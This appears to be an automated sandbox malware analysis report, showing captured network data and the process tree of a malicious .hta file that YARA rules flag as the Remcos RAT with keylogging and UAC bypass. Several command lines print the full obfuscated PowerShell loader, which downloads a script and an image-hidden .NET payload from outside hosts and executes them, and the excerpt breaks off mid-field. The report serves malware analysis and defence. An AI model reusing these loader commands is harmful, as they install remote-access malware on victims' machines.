cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1483&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1929940&cwnd=244&unsent_bytes=0&cid=ca7f8f8c25d56427&ts=458&x=0"
2024-12-13 06:38:53 UTC	1233	IN	Data Raw: 33 38 33 31 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a Data Ascii: 3831AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 4f 6b 67 44 46 33 77 2f 4e 30 66 44 38 33 77 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 Data Ascii: OkgDF3w/N0fD83w+NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4w
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 45 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 Data Ascii: ErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 58 44 34 31 67 64 4e 51 58 44 79 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d Data Ascii: XD41gdNQXDy1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvM
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 Data Ascii: DZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NI
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 41 41 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 Data Ascii: AAAwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAA
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 7a 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a Data Ascii: z01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 38 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 Data Ascii: 8xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA
2024-12-13 06:38:53 UTC	1369	IN	Data Raw: 4d 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b Data Ascii: MMJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+

Target ID:	0
Start time:	01:38:18
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta"
Imagebase:	0xc00000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:38:19
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:38:19
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:38:19
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:38:21
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
Imagebase:	0x700000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:38:22
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"
Imagebase:	0xf30000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:38:28
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
Imagebase:	0xc10000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:38:29
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: 